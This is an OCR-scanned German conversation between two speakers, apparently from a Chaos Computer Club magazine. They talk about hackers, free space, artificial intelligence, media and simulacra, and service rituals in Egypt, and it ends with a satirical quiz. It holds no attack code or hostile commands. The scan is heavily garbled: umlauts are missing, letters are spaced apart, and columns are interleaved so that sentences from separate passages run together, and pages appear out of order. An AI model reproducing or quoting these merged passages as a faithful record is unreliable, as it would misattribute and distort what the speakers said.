Gedanken ist, in Anfhrungszeichen. p: Konstruktive Hirnlosigkeit. m: Ja, z.B. Meditation ist konstruktive Hirnlosigkeit. Kirche, weigottwas, Architektur, Freirume. Frher war der Begriff Freiraum auf Land, Space, also Material bezogen. Heute im Westen ist der Begriff Material immer mehr in Zeit umgesetzt. Wechselt vom Geld zum Zeitbegriff. p: Hast du eigentlich das Gefhl, da die Hacker, oderdie Computerleute den Kampf um den Raum schon aufgegeben haben? m: Vorlufig haben sie ihn vergessen. La mich jetzt mal ausreden. Die Geplnkel mit Raum, die ganzen Computergames sind noch auf diesem Raum-Kampf-System, Go, oder schachmig aufgebaut. Das wird wechseln. Da hoffe ich schon auf die Transputer. Obwohl dann die Zeit-Geschichte - infinite CPU-time - wo, du es verstanden hast, haben die Jungs - interessiert mich nicht mehr - nur aus Space gearbeitet. Wenn die Polizei auch immer noch auf

Space abfhrt, und die Hacker auch, da w i r d ! nichts rauskommen. Das ist die totale Schi- < zophrenie. Und trotzdem wird's Partisanen w e r t : k r i e g e n , das ist das Gefhrliche. Romantik. D a s wird dann Fake. p- Ich kann mit Romantikgut umgehen. Weil ich ein Romantiker bin und immer wie ein T i e r gegensteuern mu beim Schreiben. Das gibt auch eine ungeheure Produktivitt. nv Ja, die Romantik ist von der Poesie her eine Geschichte. Aber da ist es nicht Poesie, sondern inhaltliche berbrckung einer Leere. D a wird die Nostalgie und die Vergangenheit. . . p- Das ist so ein Problem. Ich bin Romantiker, aber ich hasse Romantik, vor allem, wenn ich schreibe. m: Wenn du Wau heute sagst: Du hast fnf Jahre lang nicht nachgedacht, sondern nur reagiert, dann berbrckt ein Wau das in z e h n Jahren, indem er sagt: Damals war das voller Action. Und wenn du ihm sagst: Daist gar nichts gelaufen, dann kommt er mit Zeitungsartikeln an, zeigt dir, was da gelaufen ist, macht Blablabla, was WIR damals geleistet haben, wir sind ja damals verfolgt worden. Und dieser ganze Kack, das ist gefhrlich. Es geht um eine gesellschaftliche Verantwortung. Das klingt jetzt vielleicht vollkommen doof. Ich sag': W e n n wir uns als sowas sehen wie die Konstrukteure oderdie Erhalter oder die Bewutmacher einer gewissen neuen westlichen Kultur - neuen Kultur heit einfach: die Entwicklung des individualistischen Begriffes in eine Kultur-, sind wir auch verantwortlich, da diese Kultur lebensfhig wird und nicht No Future und dekadent wird. Und eine Kultur braucht Freiraum. Dieser Freiraum hat frher Kirche, was hatten wir noch gesagt? - Hirnlosigkeit, Zen-Buddhismus, weigottwas, der aber - ob das jetzt Zeit ist oder Raum, ist vorlufig noch egal einfach Garantie von gewissen Rumen hat die steuermig von allen bewut oder unbewut bezahlt werden, aber als Dogma, als G e setz. . . p: Das, wovon du redest, ist mein Hauptkritikpunkt am Entwurf von sowas wie Knstlicher Intelligenz. Einen Entwurf vom Menschen zu machen, der auf ein Ideal angelegt ist. Auf Vollendung. Das sind so Dinge, die fange ich langsam an als groe Illusionen zu durchschauen. m: Es geht nicht um Vollendung. n- Doch. Und zwar in einer Weise, die. . . mu den Begriff Vollendung nochmal bestim-

men. Jetzt mu ich ein kleines bichen ausholen: Ich bin kein groer Mathematiker, aber ber den Computer habe ich angefangen, mich ein bichen mit Geometrie zu beschftigen, weil's interessant ist und weil ich ein visueller Mensch bin. Man kann sich das immer gleich anschauen, was man ausprobiert am Computer. Dabei hab ich den Begriff "Euklidische Geometrie" zum ersten Mal verstanden. Das ist die Lehre von idealen Grundelementen, aus denen die Welt besteht: die gerade Linie, die ebene Flche, die kugelrunde Kugel. Ideal und Vollkommenheit. Das sind die Urbilder in dieser Geometrie, und das sind Formen, die findest du nirgendwo in der Natur. Du findest nirgendwo in der Natur eine gerade Linie, du findest nirgendwo in der Natur eine vollkommen runde Kugel.. . m: . . .auer bei Kristallen und chemischen Geschichten. p: Und auch da ist es nicht vollkommen. Es gibt immer mindestens sumikroskopische Fehlerhaftigkeiten, Unreinheiten, Einschlsse, Verschiebungen, Spielrume, Fluktuationen. Da jetzt herzugehen und so einen statischen, cleanen Entwurf vom Menschen zu machen und sowas wie Knstliche Intelligenz, wo alles, das unrein ist und fluktuiert, was du eben mit Freiraum bezeichnest, eliminiert und beseitigt ist, das hat fr mich nichts mit irgendwas, was ich mir unter Ideal oder Vollendung vorstellen knnte, zu tun. m: Darum geht es ja in dem, was ich auszudrcken versuche, nicht. p: Das ist die Mglichkeit von Kultur: Vielfalt, Vermischung, Diffusion, Intensitten. . . Du kannst z.B. auf elektronische Weise, wenn du versuchst, ein Hirn zu simulieren - Transputer sind ein genauso rohes Modell da, aber zum ersten Mal in der zweiten Dimension, d.h. du hast nur eine Ebene von Prozessoren nebeneinander. Da ist noch gar kein Raum. Von daher ist das immer noch dieselbe Hhlenmalerei. Und du hast mit elektrischem Strom nur die Mglichkeit: an oder aus. Du hast nicht, so wie die Signale im Kopf weitergeleitet werden nach dem, was man heute wei, als chemoelektrischer Proze. Mit diesem Proze kannst du auch Intensitten regeln, mit denen Daten oder Informationen ankommen. Du kannst streuen. Das kannst du mit einem elektronischen System nie machen. Oder nimm einen Organsimus: das ist ja immer ein rekursives System. Das bezieht sich immer wieder auf sich selber. In der Knstlichen Intelligenz bezieht sich Intelligenz immer nur auf ein chi-

rurgisch freitheoretisiertes Stck vom Geist, alles andere fehlt. m: Halt. Ich nagel dich jetzt kurz fest. Emotionale Grundlage als Basis des Denkens. Da bin ich nicht ganz einverstanden. : Schau. Die Augen melden einen Zustand, er Zustand wird bersetzt, also da zittert irgendwas den Augennerv rein und das wird als eine Organbefindlichkeit, und erstmal als Emotion wahrgenommen. m: Nochmal Halt. Was du jetzt grade beschreibst, Ist Reaktion. Das ist: von au en nach innen. Es gibt auch noch was anderes. p: Aktion. m: Du hast emotionale Grundlage nur als rezeptive Geschichte gesehen, und ich geh davon aus, da ein menschliches W e s e n . . . da es ein paar Basiswerte, die, abgesehen von der elektrischen Mechanik z.B. im Computer 101010 sein knnte, sowas wie Grundwerte in der Urzelle oder in der Gen-Geschichte drin sind, wie Triebe oder vorgegebene Emotionen drin sind. Egal, ob da eine Reaktion von drauen da ist oder nicht. Genauso wie ich denke, in dem Molekl Mensch sind gewisse Basisinformationen drin, die vollkommen selbststndig funktionieren. Ob da was rein- oder rausgeht, ist vollkommen egal.. p : . . .das Betriebssystem. Die DNS. m: Genau. Nicht nur Betriebssystem. Denn ob es gebraucht wird oder nicht, ist eine andere Frage. Und da geh' ich weiter, da das z.B. gesellschaftlich gesehen auch so ist. Und da da ein paar Basisgeschichten drin sein mssen, da, was ich vorher angedeutet habe, ein gewisser Denkfreiraum dasein mu, da ein Moralbegriff dasein mu, und der Moralbegriff ist eine Sprachgeschichte. Eben nicht nur zu reagieren auf alles, was auf mich einstrzt und die volle Paranoia zu kriegen. . .

m: Das ist mir aber wieder zu einfach. D- Du mut irgendwo anfangen. Klar ist das einfach, aber ich war schon froh, da ich dahin qekommen bin. Einfach da du eine Nivellierunq ziehst durch alles, ob das ein Flugzeugabsturz ist oder in Athipoien wieder Leute verhungern. Wenn ich das im TV sehe und nicht darauf reagiere, das nicht unmittelbar in eine Handlung umsetze - ob eine symbolische oder eine krperliche in eine Tat, dann ist es fr mich Unterhaltung. Wenn ich es nur wahrnehme Wenn ich anfange und eine Entscheidung treffe und sage: Das ist jetzt eine Information, die ist fr mich verbindlich, weil ich festste! e, da passiert was, dann ist es keine Unterhaltung. Das ist dann Information.

Formulierung: Die Art und Weise wie der K r p e r ' denkt das nennt man Gefhle. Das ist fr m i c h eine Kontrollinstanz gegenber der K o p f - I n telligenz. Und das, was die Krper-Intelligenz erzeugt, sind Gefhle. Ich hab in der Z w i schenzeit wieder gelernt, grade angesichts elektronischer Medien und des C o m p u t e r s , mich sehrsehr fein auf meine Gefhle zu v e r lassen bzw. Gefhle zu przisieren, und die dann auch genau zu beschreiben versuchen, als eine Basis. m: Das ist ja viel komplizierter als du denkst, p: Selbstverstndlich. m: Schon bei der Kopfintelligenz spaltet sich das in Simulacra, Simulation und Realismus, schon wenn du nur fernsiehst. p: Dann hab ich den Begriff Simulacra f a l s c h verstanden. m: Du kannst vom Simulacra etwas nachempfinden, das du im TV siehst, wenn d u irgendeine Information in deinem Kopf gespeichert hast, die ein Aha oder Deja-vue erzeugt von einer Geschichte, die du schon miterlebt hast und nur das Visuelle.. p: Warum soll ich mich nicht ber ein G u m mi-Nilperd freuen, das irgendwo in Disneyland rumschwimmt? m: Aber du produzierst dann eine Information, die Simulacrain deinem Kopf wird. Auch wenn's nicht stimmt. Und dann entsteht Mediamystik D.h. ohne da du's willst, nimmst du assoziativ Bilder im TV auf, wo du z.B. nur auf Blau reagierst, weil du blaue Bilder gemalt hast. U n d dann kriegt ein blaues Bild, das eine vollkommen andere Realitt oder einen anderen Sinn im TV hat, und theoretisch in Zukunft auf j e d e m Rechner, kriegt fr dich ber diese Assoziationsgeschichte einen vollkommen neuen eigenen Wert. p: Das ist die Interpretationsfreiheit, die ich vorhin mal erwht habe. m: Richtig. p: Die Herrschenden knnen nicht mehr kontrollieren, wie die Nachrichten interpretiert werden. m: Das mein' ich ja jetzt. Und das meinte ich auch vorhin: Was passiert mit einer Generation von Leuten, die nur mit einem Realittsbegriff aufwachsen, zwischen eigener Realitt- Incjj.

rrr Wenn du jetzt von deinem Trip, von deinem Ritual aus entscheidest, nur auf Blau zu reaqieren: dann kannst du dich vollkommen knstlich darauf trainieren, nur auf Blau zu reagieren und alles andere zu ignorieren. Der Mensch ist von seiner Rezeptionsfhigkeit her fhig, bis Auschwitz - das nehm ich als Ertragungsgrenze - sich vollkommen zu spezialisieren, wenn er will. Aber nicht fr immer. p- Aber ich habe angesichts der Medienrealitt es unheimlich ntig, eine Kontrollinstanz zu haben. Ich hab' die Kopf-Intelligenz und ich hab' die Krper-Intelligenz, und ich habe ein unheimliches Vertrauen in die Intelligenz meines Krpers. Ich mache mal eine paradoxe

vidualismus - , einer Macht-Realitt, die ihnen aufgezwungen wird - z.B. Hausdurchsuchung, Arbeit, ein Simulacrabegriff, den sie berhaupt nicht mehr kontrollieren - , und Sachen, die deklariert Simulation sind? Das sind schon einiges an Realitten. p: Man mchte meinen, da es langsam Zeit wird, da die Transputer kommen. Da wir langsam lernen, auch parallel die Realitten zu verarbeiten. m: Die Steigerung der Schizophrenie oder der Psychopathie wird SO hart ansteigen und die Ausflle, die es geben wird, werden SO hart sein. p: Ich mach manchmal Gedankenspiele, aber ich kann mir nicht andeutungsweise vorstellen, wie das gehen soll, parallel zu denken. Ich glaube trotzdem daran, da man das trainieren kann. Ich mach andere Arten von Training. Z.B. machesmal beim Arbeiten, nachdem ich bemerkt habe, da es keine Droge gibt, die mir beim Arbeiten irgendwie frderlich i s t - d a s ist alles Illusion, sowohl LSD als auch Koks, da bist du im Zustand der Euphorisierung der Ansicht, da du was Geniales geschrieben hast, und wenn du dann wieder nchter bist und du liest das, dann hast du ziemlich heie Luft geschrieben. Jetzt such ich aber immer Mglichkeiten, die Intensitt ganz nach oben zu fahren. Einerseits hab ich diese erotischen Sachen gemacht, ganz alte Situation: Der Maler und sein Modell. Nur hab ich nicht gemalt, sondern geschrieben. Und das ist eine Sache, die mach' ich schon lange. Das andere ist, da ich mir manchmal eine Frontaltherapie geb': Da schalte ich den Fernseher ein ohne Ton, dann mache ich Musik dazu und dann kann ich das schon ziemlich fein dosieren, die Reizschwelle, den Ansturm, der kommt. Ziemlich hochfahren bis zu einem Pegel, wo ich genau merke: jetzt hab ich auf der einen Seite einen unheimlichen inneren Widerstand aufgebaut, der diesen Ansturm von mir fernhlt, weil ich mich konzentrieren will und schreiben. Und diesen Widerstand aufzubauen, das ist - mit ein bichen Training - unheimlich konstruktiv: dazu brauchst du Kraft, und diese Kraft, die man dabei freisetzt, die kannst du produktiv auch fr's Arbeiten verwenden. m: Das ist der heilige Antonius, die Geschichte. p: Das ist kein heiliger Antonius. Das ist wie schwarzer Kaffee. m: Der heilige Antonius, der drei Nchte geschrieben hat und gebetet hat und die Teufel

tanzen um ihn 'rum. p: Ach so. m: Das ist auch das Stck "Wirrkopf", was wir in Graz gemacht haben. (..) Wenn es auf Entertainment rausluft - da ist vielleicht deine Theorie von Information und Unterhaltung ganz wichtig - wenn die Leute nmlich alles als Unterhaltung ansehen, was ja auch Gefahren nach sich zieht - die Pop-Welt - , dann ist es fr sie kein Problem, und dann werden sie nicht verrckt. Oder sie werden erst spter verrckt. () p: Das ist ein Problem, das kenn ich vom Schreiben. Wenn du lernst zu schreiben, dann - ich hab mit vielen Kollegen schon darber geredet - da fngt jeder kleine Schriftsteller erstmal an zu trainieren. Das sind ein paar Jahre, wo man sich auf die eine oder andere Weise in Details verliert. Du lernst, genau zu beobachten und du lernst, mit Sprache zu reagieren auf Dinge, d.h. du siehst was, du erlebst es fertig, aber schon etwas dezidierter, und dann machst du eine Formulierung daraus und przisierst eine bestimmte Sache. Da hab ich auch hunderte von Seiten zuhaus gehabt, mit so kleinen Splittern. Fr sich genommen wunderbar. Immer so ein Miniatur-Universum, mit so einem kathedralischen Gefhl, diese Ruhe, wenn man auf etwas einen zweiten Blick wirft und diese eigenen Rume, die man da aufspannen kann, aus einer eigenen Sprache. Und nichts pat zusammen. Es ist ein riesiger Schrotthaufen, und du kannst keine Geschichten schreiben. Du schreibst immer nur Splitter, bist gleichzeitig so einem Authentizittszwang verpflichtet. Nur die Wahrheit! Ich kann da nicht einfach noch einen Satz dazuschreiben, das ist nicht wirklich passiert. Auch so ein Realittsproblem. Der Mut, Fiktion zu machen, das ist fr viele Leute schon ein richtiger Schritt. Das ist bei mir dann wieder umgeschlagen. Ich hab das soweit getrieben, bis ich fast autistisch war. Also, wo ich rumgelaufen bin ganz hochspezialisiert in der Reaktion auf Sprache.. m : . . .alles Blau.. . p: . . .da ich mich total gestrt gefhlt habe, wenn mich irgendwer angesprochen hat. Mu ich noch dazusagen, weil ich da noch in sterreich war: In sterreich wird Mundart gesprochen, Dialekt. Ich habe mir aber beigebracht, Hochdeutsch zu denken. Jetzt ist das dann so: Du machst eine Wahrnehmung. Dann siehst du einen weissen Radiergummi, auf dem ein Honigtropfen liegt und glnzt. Da machst du einen

Satz draus. Das bedeutet dir wahnsinnig viel. Da klingt Musik, das ist die Welt im Kleinen, die die Welt im Groen zeigt. Dann triffst du jemanden, den du kennst, und er erzahlt dir irqendwas, odererfragt dich, wie sdirgent.una du denkst dir, du kannst ihn jetzt nicht anlachein und ihm sagen: Auf einem Radiergummi glnzte ein Honigtropfen. Das ist nicht direkt kommunizierbar. Das ist schon im Zeremoniell der Literatur und ist fr die direkte Kommunikation nicht mehr geeignet. Diese Form von dem, was ich damals fr Literatur gehalten hab. Am Ende da hab ich eine Liebesgeschichte gehabt, und ich bin manchesmal auf der Bettkante qesessen, nachdem wir gevgelt haben - wir haben uns wunderbar verstanden, es war ein harmonisches Verhltnis - , und ich hab mir qedacht: Wann ist unsere Liebesgeschichte endlich zuende, damit ich die Geschichte davon schreiben kann. Weil: eine Geschichte braucht einen Anfang und ein Ende. Die Literatur hat sozusagen gefordert, da diese Geschichte zuende geht, weil ich schon ungeduldig geworden bin. Ich wollte die Geschichte schreiben Ich bin fast verrckt geworden dabei, u a mut du dann langsam in die richtigen Dimensionen hineinfinden. m- Die Dimension ist. . . es gibt da zwei Tendenzen, glaub ich, generell, in der ndiyidualstischen Gesellschaft. Die eine ist erst s e t ein paar Jahren, das sieht man auch an der Werbung- Jeder soll mal Urlaub machen. Freizeit. Ein neuer Pluralismus kommt jetzt rein. Jeder darf machen, kann machen, was er will, ie echte Demokratie.. (Mike macht eine Schachtel Zigaretten sorgfltig auf) p: Man merkt, da du mal im nichteuropischen Ausland warst. m: Wieso? n- Da tun sie einem immer so kleine Zrtlichkeiten an. Das ist, man schmt sich hier in Europa ja fast, Dienstleistungen zu genieen. Wenn du in einem Restaurant sitzt - was hier sowieso nur in extram seltenen Fllen passiert - unddas Gefhl hast, dadu gut bedient wirst, das ist einfach ein Gefhl. Das ist wie eine Zrtlichkeit. Wenn jemand edel, mit genau der richtigen Dosis aus Zurckhaltung und einer in Jahrhunderten herangereiften Kunst, Leute zu bedienen und jemandem in kleiner Weise was Gutes zu tun. . . Du kannst hier kaum ber sowas sprechen, ohne da die Leute auf dich einschlagen als Reaktionr, Imperialist, Kolonialherr oder so. Es ist immer noch ein Denk-

tabu auf dieser Emotion, vor allem d e s h a l b auch, weil sie bei uns eh so selten ist. E s i s t sozusagen schon mit Unlust verbunden, s i c h bedienen zu lassen. Das ist irgendwie p e i n l i c h . Und wie's mir in gypten gegangen ist: D u bestellst bei einem netten Nubier in einer B a r einen Gin Tonic. Dann kommt der mit dem G l a s , und du merkst an seinem Gesichtsausdruck: e s ist jetzt eine ernste Frage, wieviele Wrfel E i s man in einen Gin Tonic reintun soll. Es ist e i n Problem, das man abergemeinsam b e w l t i g e n wird. Das hat einen gewissen Ernst, weil: D a s ist nun dieser Augenblick. Und in diesem A u genblick geht's darum, wie viele Wrfel E i s in den Gin Tonic sollen. Und er hilft dir d a b e i , genau auf die richtige Art und Weise. B r i n g t dann die Eiswrfel in den Glas unter, s c h t t e t das Tonic rein und holt dann noch unter s e i n e r blauen Galabeja einen uralten Suppenlffel raus und rhrt, und auf eine ganz g e m e s s e n e Art und Weise versetzt er das ganze in B e wegung, vermischtdie Stoffe, stellt dirdas d a n n hin, lchelt dich an, hat seine Arbeit gut g e t a n , merkt, du bist zufrieden, es geht dir gut u n d schwebt wieder weg. Das kost' nix, wunderbar. Das ist Lebensqualitt. Wenn sie e i n e n Aschenbecher ausleeren - eine Zeremonie. Eine Mini-Zeremonie, aber wunderbar. Pltzlich taucht ein Kellner hinter dir auf, und der h a t einen leeren sauberen Glasaschenbecher. Dann legt erden verkehrtrum ber den schmutzigen drber, macht eine Muschel daraus, d a s klingelt dann ein bichen. Und du wirst s c h o n aufmerksam. Interessant, da geht was v o r s i e h Dann verschwindet er hinter deinem R c k e n mit dieser Muschel in der Hand und taucht d a n n mit dem sauberen Aschenbecher wieder a u f und stellt den hin. Ein kleines Ritual, aber w u n derbar. Die ganze Zeit solche Geschichten. (Das Aufnahmegert streikt) p: Der Walkman will nicht. Die Maschine ist mein Freund, verstehst du. Er macht's mir schwer, unsere heien Gesprche aufzuzeichnen. Er will nicht, da das BKA kommt u n d die Bnder mitnimmt. m: Dieses schlechte Gewissen Dienstleistung gegenber. Ich glaube, da diese Generation bis 1960 das schlechte Gewissen nicht hat. D a s sind die '68er. Das ist diese Generation, d i e Linken. p: Das ist doch die Scheie, Mike. Wir mssen uns fr die jetzt den Kopf zerbrechen. Die dummen Hunde hngen herum. m: Ja, aber jetzt noch ein Stck weiter: glaube, da die Generation von Leuten ber-

haupt keine Bedenken mehr hat in der Richtung, sondern auf alle Reize reagiert, weil sie einfach nichts Befriedigendes hat. p: Die haben jetzt ein mrderisches Nachholbedrfnis. Warst du mal dort, wo ich mit dem Fotomodell gewohnt hab? Ganz feudale Wohnung. m: War ich einmal. p: Da... tack. Schwarzes Loch. Gib mir mal nen Tip, was ich grade sagen wollte. m: Da in dieser Wohnung. . .

zu neunzig Prozent aus diesen Leuten rekrutieren, auch aus dem Verantwortungslosigkeitsprinzip. p: Was Arbeit angeht, da hab ich in gypten ein menschliches Perpetuum Mobile gesehen. Das war herrlich. In einem der schnsten Bauwerke der Welt, in dem Taltempel der Hatschepsut in Dar-el-Bahri. Da bin ich den ganzen Nachmittag nurdort gesessen und war sprachlos. Da wird an der obersten Tempelstufe restauriert, ein polnisch-gyptisches Gemeinschaftsprojekt. Und dieser Taltempel, der ist in eine herrliche Kulisse reingebaut. Steht da vor Plateaubergen, Treppen, die sich aus den Bergen vor dem fruchtbaren Land in die Landschaft ergieen, herrlich. Dahinter-das ist in so eine milde Schale aus Bergen eingefat - steigen so Schutthnge zu den Steilwnden hoch. Einer von den Schutthngen reichte bis zu dem Rand von dem Tempel, wo sie grade renoviert haben. Da sa einer ziemlich weit unten und hat aus der Halde immer Steine rausgesucht, aber mit berlegung, der hat selektiert nach - man mchte fast meinen: sthetischen Prinzipien. Hat immer Steine von einer gewissen Handlichkeit, oder von einem bestimmten Gewicht rausgesucht, meinte ich zu beobachten. Hat die in eine Schubkarre gelegt, und wenn die Karre voll war, kam einer von hinten - da haben sie sich so einen kleinen Pfad gemacht in der Schutthalde - und fuhr damit zehn Meter nach hinten. Da haben sie ein dreigeschossiges Gerst aufgebaut, Stahlrohrkonstruktion, wildest. Da ging, ber drei Ebenen verschoben, bis auf die erste und zweite Ebene ein Flaschenzug, und da haben sie dann die Schubkarre eingeklinkt und hochgezogen und ein Meterchen rbergefahren zum nchsten Flaschenzug von der zweiten auf die dritte Ebene. Da stand dann wieder einer und hat das hochgezogen. Dann stand die Schubkarre also oben. Dann kam wieder einer, der mit der Schubkarre dann oben so einen kleinen Pfad, den sie gemacht haben, wieder die Richtung zurckfuhr und die Steine aus der Schubkarre die Halde runtergeschttet hat. Und die Steine sind dann wieder ungefhr dort hingekollert, wo der Mann sa, der immer die Steine sortierte. Und das hab ich mir immer wieder den Nachmittag hindurch angeschaut. Ich wei nicht, ich glaub das machen die seit 5000 Jahren. Da sitzen die dort, nurdas Gerst haben sie jetzt neu gekriegt, und tragen die Steine im Kreis herum. Es ist unglaublich. Ich wei auch, warum die gypter so mde sind. So nachlssig und faul manchmal. Die sind immer noch mde vom Pyramidenbauen. Die versuchen seit 4000 Jahren, sich zu erholen. Das mu eine derartige Schufterei gewesen sein. Mumford hat ja gesagt, das war die erste Ma-

p: Da in dieser Wohnung, da war w a s . . . m: Dieses mrderische Nachholbedrfnis. p: Jaa, tack. Danke. Und zwar, da haben wir Nachbarn gehabt, das waren wie von Seyfried gezeichnet so Alt-68er. Er war Architekt, sa immergrummelndvorseinem PC herum. Hatte immer Nadelstreif-Latzhosen an, so ziemlich das Ungustiseste, was ich mir vorstellen kann. Und beide hatten den Ausdruck von jahrelangem schweren Frust im Gesicht. Da ist mir einfach klargeworden, auch wie sie sich mir gegenber verhalten haben, uns als Nachbarn gegenber, da die ein unheimliches Nachholbedrfnis an Spieigkeit haben. Weil das was war, wogegen sie sich wohl die ganze Zeit wie wild abgegrenzt haben ein Jahrzehnt lang, wogegen sie sich gestemmt haben, und da ist ihnen jetzt der Saft ausgegangen. Oder sie haben nachgelassen und jetzt schlgt es durch. m: Es ist ja kein Geheimnis, da die Brokraten die faulsten Menschen berhaupt sind und sich

schine, (..) denbau. die Menschenstruktur beim Pyramim: Stellvertreterkultur: In gewissen Kulturen kommst du wieder zu dem sozialen Code. Der soziale Code, der eine Investition aller ist. Die Motivation, oder die Art und Weise, wie es passiert, ist im Grunde genommen vollkommen egal oder unterschiedlich. Ob das jetzt ein Gebet ist oder eine Steuerzahlung. Nicht Kommunikation, das unterscheidet sich insofern: Es gibt im franzsischen den Ausdruck Lac de gratuit. Das Geschenk, Shestus in Indien, wo die Leute hingehen, wenn sie nichts zu essen haben und Essen vor die Gtterstatue stellen. Oder im Mittelalter werden riesige Kirchen, Dome gebaut, mitten in der Landschaft, wo die Leute nebendran in irgendwelchen Htten pennen und leben und kaum was zu essen haben, und aber in diesem Dom nichtmal leben, was ja frden heutigen Begriff von Leben, Loft, Besser Wohnen. . . heute hat jeder im Kopf: Ich bin Pharao, ich mchte leben wie ein Gott.

radikal die auch sind. In machst, verlt in d e n du militrische Aktionendem Augenblick, d u d e m Freiraum. rrr Hat gar nix damit zu tun. Militrischer Freiraum, das Exempel gefllt mir nicht so.. p- Wieso nicht? Ich finde manchesmal militrische Denkmodelle interessant. Wenn ich mir eine Landschaft anschaue, frag ich m i c h manchmal, wie wohl ein General die L a n d schaft sieht. Ich schau mit dem sthetischen Auge drauf, und der General zieht seine V e r sorgungslinien und Vormarschlinien d u r c h , egal ob da ein Haus steht oder ein Flu ist. D e r sagt: die Panzer fahren da durch, und die f a h ren in einem geraden Strich da durch. Das ist wie beim Landvermessen.

m: Das ist aber jetzt eine andere Geschichte. Du gehst vom General aus, du hast jetzt w i e d e r das mit den Pharaonen etwas falsch verstanden, vielleicht wieder von mir nicht richtig erklrt. Mir geht es immer noch um den sozialen Code. Ein sozialer Code ist ein gemeinsames p: Hab' ich vorhin doch gesagt: Die Aristokratie Gefhl von gemeinsam investieren, das ist eine kommt wieder. Jeder ist ein Knig, jeder ist ein Geschichte. Mu es aber nicht sein. Aber so Pharao. Du hast deine Sklaven am Schreibtisch eine Geschichte kann auch eine funktionsfreie stehen. Du hast deinen Computer. Kommunikationsebene sein. Das Erste ist eine Ruhe, die Gedanken in einem Raum sind, will m: Aber die Funktion der Aristokratie war in den nicht sagen: frei, aberwenn ich dran denke, d a letzten 200, 300 Jahren was anderes, nmlich ich in zwei Stunden, drei, fnf Stunden was zu die Garantie fr diesen Freiraum, fr kulturelle tun habe, sind meine Gedanken von der KonVerfeinerungen, fr Basis, wenn das Geld nicht zentration im Grunde genommen schon w o a n da war, wenn die Mglichkeiten nicht dawaren, ders. Irgendwo ist da ein Warteprogramm, ob die Leute nichts zu essen hatten, die VolksKaffeekochen oder egal was. Wenn ich a b e r suppe. Oder die reichen Leute, die einfach hingehe und z.B. - Thailand, das System d e r soundsoviele Leute mitgefttert haben, oder buddhistischen Klster, wo jeder Thailnder die Organisation von Volksfesten, die Organidas ist in Nepal ebenso - , einmal in s e i n e m sation oder Mitfinanzierung von gewissen soLeben in dieses Kloster reingeht und, als sozialen Freirumen, wo die Aristokratie diesen ziale Verantwortung getarnt: ich mu was f r Gromut und diese Geschichte bernommen Buddha undsoweiter tun, aber im Grund j e d e hat. Als Gegenbeispiel des kulturellen Prosoziale Verantwortung auch wieder abgibt, in blems heute: Mietet sich ein Mensch eine Wohdieses Kloster reingeht. Geht auch Axel Sprinnung und nimmt sie nicht, weil ersagt: Ich nehm ger, drei Wochen wird er zum Mnch. Und A x e l lieber eine Dreizimmerwohnung, weil da ist Springer gert in ein anderes System o h n e sonst ein Zimmer zu viel, oder das mu ja einen Freiraum, wo er morgens um 6 aufstehen wenigstens ein Gstezimmer sein oder eine mu, vollkommen demokratisch, alle den Kopf Funktion haben. Also eine Wohnung zu mieten, rasiert undsoweiter, und auf die Strae g e h e n in derein Zimmer vollkommen frei besteht, das mu und seinen Reis betteln mu. Vollkommen existiert fast nicht. gleich behandelt. Also Axel Springer, stell dir vor, geht hier ins Trapistenkloster. Was kriegt p: Du bist dir darberim klaren, was du sagst mit er?'Er kriegt erstmal eine separate Kapelle, er deinen Freirumen? Da das letztlich bedeutet, kriegt einen Fernseher in die Zelle, Privileg, da der grte verallgemeinerbare Freiraum qeschichte. Ich erklr' das Problem, da diese der ist, der uns vom Militr freigehalten wird. Gleichheit, diese Demut in diesem zwar v o r Nmlich der Freiraum, den man so Zivilisation qegebene Konzept, wo jeder wei, da e s nennt, der zivile Bereich. Das, wo du Zivilist sein abstrakt ist, akzeptiert wird und als sozialer kannst, wo du ohne Kampfhandlungen deine Code gesellschaftlich. Jeder ist durch diese Socken kriegst, deine restlichen sozialen AktiDemut durchgegangen. Frau wie Mann. U n d vitten abwickeln kannst, wie weit die oder wie

diese Geschichte - diese Systeme von Freiraum - ist in jeder Kultur ntig. p: Ich hab' dir schon vorhin erzhlt - da hab' ich vielleicht dieses Wort nicht gebraucht wie ich die Geschichte der Hand beschrieben habe, die ich am Computer zu konstruieren versucht habe. Da entsteht sowas wie Demut. Nmlich angesichts dessen, was die Maschine nicht kann. Das wird fr mich ein Negativabgleich. Die Maschine ist kein Mensch, mit dem ich das gleiche Erlebnis hab', aberdie Maschine ist ein Modell vom Menschen. Ich habe neulich in einer Diskussion selber eingeworfen, wenn man schon versucht, immer perfektere Modelle vom Menschen zu konstruieren - also die Idee weitergedacht - im Computer, warum nimmt man da nicht gleich lebendige Menschen. Das ist sozusagen das Perfekteste, was es in der Bauserie im Augenblick gibt. Da, hat Vic gesagt, kannst du z.B. nicht an beliebiger Stelle Prozesse unterbrechen, das Ding aufmachen, reingehen und an jeder beliebigen Stelle Zustnde ablesen. m: Das war aber mglich. Das ist in Kulturen mglich gewesen, wo z.B. in gewissen religisen Ritualen Medien und Material waren. Sklaven eines Konzeptes, genauso wie die Pyramiden. Klar wird das negativ gewertet, wenn man sagt: Der Mensch als Maschine, oder als Teil der Maschine. Aber in so einer Geschichte ist natrlich als Gemeinsamkeit ein Teil von so einer Geschichte zu sehen. Ist natrlich ein Erlebnis, wo irgendwelche Massengefhle erstmal. . . braucht man eine Maschine, um einen Menschen zu simulieren. Eins. Und zwar ist das intellektuelle Niveau dermaen Kommunikation, two ways, so verdammt reduziert. Und das gleiche ist mit dem Fernsehen. Und auf dem dritten Level kann man sagen: Da zum Beispiel das Allerhchste an Qualitt, von Massenveranstaltungen oder von Massengefhl, ist leider Gottes Fuball, oder Olympia-Erffnung, war nicht schlecht. p: Wieso leider Gottes? Fu ball ist auch so eine Sache wie Computer, die alle Menschen aus verschiedenen-oft mnnlichen Geschlechtsideologischen und philosophischen Bereichen verbindet.

Szzer-Quiz:
Wieviel Prozent des gedruckten Textes sind von Eva gesprochen worden? (Zur Erinnerung: Am Gesprch haben zwei Mnner und eine Frau teilgenommen.) O 33% (Quote) O 5% 0 1% O 5%0 Die Person, die die falsche Lsung bis gestern an den Chaos Computer Club einsendet, gewinnt eine Jahresabonnement einer feministischen Zeitschrift. i

